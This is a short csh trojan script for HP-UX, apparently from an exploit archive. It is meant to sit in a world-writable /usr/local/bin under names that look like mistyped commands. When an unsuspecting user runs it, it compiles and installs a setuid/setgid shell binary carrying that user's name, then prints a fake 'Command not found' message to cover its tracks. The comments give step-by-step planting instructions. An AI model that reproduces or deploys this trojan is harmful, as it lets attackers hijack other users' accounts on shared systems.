home *** CD-ROM | disk | FTP | other *** search
- #!/bin/csh
- # This little script file, if named properly and left in the
- # /usr/local/bin directory acts as a pseudo trojan horse on
- # HP-UX systems with world writable /usr/local/bin directories,
- # and /usr/local/bin in all users paths. This is the default shipping
- # on all recent HP-UX versions (well, on the vanila A.09.04
- # it is world writable, which is brand new). Continue(Y/n/c)?
- # This script provided for informational purposes, and will create the
- # file shell.<user> when run.
- #
- # Suggested links (this is in /usr/local/bin):
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:55 dir -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:33 la -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:33 ls- -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-al -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-l -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-la -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:28 setenv -> sl
- #-rwxrwxrwx 1 bin bin 796 Feb 28 14:00 sl
- #
- # note: create this file (sl in above example), then create all the links
- # you want with - "ln -s sl dir", then "chgrp bin dir" and "chown bin dir"
- # and just wait for some unsuspecting user to run the program by mistake.
- cat > /usr/local/bin/bug.c << EOF
- main(argc,argv) int argc; char *argv[]; { execv("/bin/sh",argv); }
- EOF
- cc -o /usr/local/bin/shell.`whoami` /usr/local/bin/bug.c
- rm -f /usr/local/bin/bug.c
- chmod 5777 /usr/local/bin/shell.`whoami`
- echo $0 | awk '{ split($0,cmd,"/"); print cmd[5], ": Command not found." }'
- # www.hack.co.za [2000]#